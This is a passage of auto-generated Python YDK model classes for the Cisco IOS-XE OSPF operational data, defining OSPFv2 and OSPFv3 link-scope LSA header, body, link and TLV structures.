('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
('version', (YLeaf(YType.uint32, 'version'), ['int'])),
('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])),
])
self.lsa_id = None
self.adv_router = None
self.decoded_completed = None
self.raw_data = []
self.version = None
self.router_address = None
self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa()
self.ospfv2_lsa.parent = self
self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal()
self.ospfv3_lsa_val.parent = self
self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val"
self.tlv = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv()
self.tlv.parent = self
self._children_name_map["tlv"] = "tlv"
self.ospfv2_link = YList(self)
self.ospfv2_topology = YList(self)
self.ospfv2_external = YList(self)
self.ospfv2_unknown_tlv = YList(self)
self.ospfv3_link = YList(self)
self.ospfv3_prefix_list = YList(self)
self.ospfv3_ia_prefix = YList(self)
self.multi_topology = YList(self)
self.unknown_sub_tlv = YList(self)
self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value)
class Ospfv2Lsa(Entity):
"""
OSPFv2 LSA
.. attribute:: header
Decoded OSPFv2 LSA header data
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv2 LSA body data
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__()
self.yang_name = "ospfv2-lsa"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv2-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value)
class Header(Entity):
"""
Decoded OSPFv2 LSA header data
.. attribute:: lsa_id
LSA ID
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: opaque_type
Opaque type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: opaque_id
Opaque ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: age
LSA age
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: type
LSA type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: adv_router
LSA advertising router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seq_num
LSA sequence number
**type**\: str
**config**\: False
.. attribute:: checksum
LSA checksum
**type**\: str
**config**\: False
.. attribute:: length
LSA length
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: flag_options
LSA options
**type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
])
self.lsa_id = None
self.opaque_type = None
self.opaque_id = None
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self.flag_options = Bits()
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
class LsaBody(Entity):
"""
Decoded OSPFv2 LSA body data
.. attribute:: num_of_links
Number of links
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: network
Network details
**type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network>`
**config**\: False
.. attribute:: summary_mask
Summary mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_mask
External mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: body_flag_options
LSA body flags
**type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))])
self._leafs = OrderedDict([
('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
])
self.num_of_links = None
self.summary_mask = None
self.external_mask = None
self.body_flag_options = Bits()
self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
class Network(Entity):
"""
Network details
.. attribute:: network_mask
IP network mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: attached_router
List of the routers attached to the network
**type**\: list of int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
])
self.network_mask = None
self.attached_router = []
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
class Ospfv2Link(Entity):
"""
OSPFv2 LSA link
.. attribute:: link_id (key)
Link ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: link_data (key)
Link data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: type
Link type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: ospfv2_topology
Topology specific information
**type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__()
self.yang_name = "ospfv2-link"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['link_id','link_data']
self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))])
self._leafs = OrderedDict([
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
])
self.link_id = None
self.link_data = None
self.type = None
self.ospfv2_topology = YList(self)
self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)
class Ospfv2Topology(Entity):
"""
Topology specific information
.. attribute:: mt_id (key)
MT\-ID for topology enabled link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "ospfv2-link"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2Topology(Entity):
"""
Summary LSA
.. attribute:: mt_id (key)
MT\-ID for topology enabled link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2External(Entity):
"""
External LSA
.. attribute:: mt_id (key)
MT\-ID for topology enabled on the link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, self).__init__()
self.yang_name = "ospfv2-external"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
])
self.mt_id = None
self.metric = None
self.forwarding_address = None
self.external_route_tag = None
self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv2UnknownTlv(Entity):
"""
OSPFv2 Unknown TLV
.. attribute:: type (key)
TLV type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: length
TLV length
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: value
TLV value
**type**\: list of int
**range:** 0..255
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__()
self.yang_name = "ospfv2-unknown-tlv"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('value', (YLeafList(YType.uint8, 'value'), ['int'])),
])
self.type = None
self.length = None
self.value = []
self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value)
class Ospfv3LsaVal(Entity):
"""
OSPFv3 LSA
.. attribute:: header
Decoded OSPFv3 LSA header
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv3 LSA body
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__()
self.yang_name = "ospfv3-lsa-val"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv3-lsa-val"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value)
class Header(Entity):
"""
Decoded OSPFv3 LSA header
.. attribute:: lsa_id
LSA ID
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: lsa_header
LSA header
**type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader>`
**config**\: False
.. attribute:: lsa_hdr_options
OSPFv3 LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv3-lsa-val"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
])
self.lsa_id = None
self.lsa_hdr_options = Bits()
self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader()
self.lsa_header.parent = self
self._children_name_map["lsa_header"] = "lsa-header"
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
class LsaHeader(Entity):
"""
LSA header
.. attribute:: age
LSA age
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: type
LSA type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: adv_router
LSA advertising router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seq_num
LSA sequence number
**type**\: str
**config**\: False
.. attribute:: checksum
LSA checksum
**type**\: str
**config**\: False
.. attribute:: length
LSA length
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__()
self.yang_name = "lsa-header"
self.yang_parent_name = "header"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
])
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self._segment_path = lambda: "lsa-header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
class LsaBody(Entity):
"""
Decoded OSPFv3 LSA body
.. attribute:: network
OSPFv3 network
**type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network>`
**config**\: False
.. attribute:: prefix
OSPFv3 inter area prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix>`
**config**\: False
.. attribute:: ia_router
OSPFv3 inter area router
**type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter>`
**config**\: False
.. attribute:: lsa_external
OSPFv3 LSA external
**type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal>`
**config**\: False
.. attribute:: nssa
OSPFv3 NSSA
**type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa>`
**config**\: False
.. attribute:: link_data
OSPFv3 Link data
**type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData>`
**config**\: False
.. attribute:: ia_prefix
OSPFv3 Intra area prefixes
